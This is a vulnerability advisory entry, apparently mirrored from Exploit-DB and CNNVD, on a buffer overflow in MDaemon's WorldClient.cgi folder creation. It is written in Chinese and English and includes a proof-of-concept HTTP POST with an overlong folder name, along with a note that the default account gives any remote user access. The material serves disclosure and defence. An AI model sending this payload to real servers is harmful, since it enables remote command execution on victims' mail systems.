https://www.exploit-db.com/exploits/21439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-429

MDaemon是一款集成邮件传输代理、WEBMAIL、邮件防病毒的程序，可使用在MicrosoftWindows操作系统下。MDaemon在建立用户文件夹时没有正确充分的检查文件夹名长度，可导致远程攻击者以MDaemon进程权限在目标系统上执行任意命令。通过使用worldclient的WEB接口在建立超长文件夹名操作时缺少正确检查，可导致攻击者提交超多的字符串作为文件夹名提供给WorldClient.cgi脚本，在建立文件夹过程中可导致缓冲区溢出，精心构建字符串数据可能以MDaemon进程的权限在目标系统上执行任意命令。攻击者提交这样的URL时需要先经过认证，由于MDaemon存在默认帐户漏洞，所以任意远程用户都可以利用这个漏洞进行攻击。

source: http://www.securityfocus.com/bid/4689/info

MDaemon is an integrated mail transport agent, webmail, and mail anti-virus package. It is available for Microsoft Windows operating systems.

It may be possible for a remote user to take advantage of a buffer overflow in the MDaemon software package. The WorldClient.cgi program packaged with MDaemon does not properly check bounds on user-supplied data. During the process of creating a folder with a long name, it is possible to exploit a buffer overflow in the CGI that could result in the overwriting of process memory, and execution of attacker-supplied instructions.

POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3000
Content-Length: 1636
Connection: Keep-Alive
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxxx

OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder=AAAAAAAAAAAA
AAA[BUFFER_HERE_1000+chars]&NewFolderParent=&Create=Create&Folder%3AInbo
x=Inbox&Folder%3ADrafts=Drafts&Folder%3ASent=Sent&Folder%3ATrash=Trash&F
older%3As=s

来源:XF
名称:mdaemon-worldclient-foldername-bo(9026)
链接:http://xforce.iss.net/xforce/xfdb/9026
来源:BID
名称:4689
链接:http://www.securityfocus.com/bid/4689
来源：NSFOCUS
名称：2739
链接：http://www.nsfocus.net/vulndb/2739